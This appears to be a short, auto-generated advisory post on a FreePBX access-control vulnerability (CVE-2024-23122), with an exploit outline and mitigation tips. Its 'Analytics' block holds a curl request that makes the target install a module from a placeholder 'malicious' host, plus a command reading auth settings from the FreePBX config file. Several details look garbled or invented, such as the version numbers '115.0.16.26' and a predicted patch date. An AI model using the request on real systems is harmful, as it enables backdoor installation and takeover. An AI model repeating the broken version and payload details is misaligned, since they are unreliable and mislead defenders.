Sangoma FreePBX, Incorrect Access Control, CVE-2024-23122 (Critical)

Listen to this Post

How the CVE Works

The vulnerability exploits incorrect access control within the FreePBX web interface. Specifically, it involves improper validation of user permissions for accessing certain administrative API endpoints or modules. An authenticated attacker, even with low-level privileges, can craft malicious HTTP requests to these endpoints. The system fails to correctly verify if the requesting user has the necessary authorization, allowing them to execute privileged actions. This can lead to complete system compromise, including creating administrative accounts, modifying system configurations, or accessing sensitive data, by bypassing intended security boundaries.
Platform: Sangoma FreePBX
Version: 115.0.16.26 below
Vulnerability: Incorrect Access Control
Severity: Critical
date: 2024-01-17

Prediction: Patch expected 2024-02-07

What Undercode Say:

Analytics

grep -r "checkPermission|hasPermission" /var/www/html/admin/modules/
cat /etc/freepbx.conf | grep -i "user|auth"
curl -ks -X POST "https://<TARGET>/admin/ajax.php?module=moduleadmin" --data "action=install&data[bash]=http://malicious/package.tgz"

How Exploit:

  1. Attacker gains low-privilege user credentials (e.g., via phishing).
  2. Crafts a POST request to a vulnerable administrative endpoint (e.g., /admin/ajax.php?module=moduleadmin).
  3. Sends a malicious payload instructing the system to install a custom module from a controlled server.
  4. The installed module contains backdoor code, granting the attacker full administrator access.

Protection from this CVE

  • Immediate upgrade to FreePBX versions 115.0.16.27, 14.0.13.12, or 13.0.197.14.
  • Implement strict network access controls for the admin interface.
  • Apply the principle of least privilege for all user accounts.
  • Use Web Application Firewall (WAF) rules.

Impact:

Privilege Escalation

System Compromise

Data Breach

Remote Code Execution

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: www.cve.org
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top